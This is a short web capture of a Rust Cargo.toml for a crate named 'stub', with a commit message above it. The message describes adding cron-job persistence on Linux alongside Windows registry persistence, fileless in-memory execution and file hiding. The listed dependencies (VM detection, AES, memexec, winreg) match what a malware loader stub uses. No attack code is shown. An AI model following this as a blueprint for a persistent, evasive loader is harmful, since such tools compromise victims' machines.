- Implement conditional compilation for platform-specific dependencies - Add Linux persistence via cron jobs as alternative to Windows registry - Create cross-platform fileless execution (memexec for Windows, temp file + exec for Linux) - Support platform-specific paths and file hiding mechanisms - Maintain full Windows compatibility while adding Linux support
18 lines
324 B
TOML
18 lines
324 B
TOML
[package]
|
|
name = "stub"
|
|
version = "0.1.0"
|
|
edition = "2021"
|
|
|
|
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
|
|
|
|
[dependencies]
|
|
inside-vm = "0.2.0"
|
|
aes = "0.8.2"
|
|
|
|
[target.'cfg(windows)'.dependencies]
|
|
memexec = "0.2"
|
|
winreg = "0.9"
|
|
|
|
[target.'cfg(unix)'.dependencies]
|
|
libc = "0.2"
|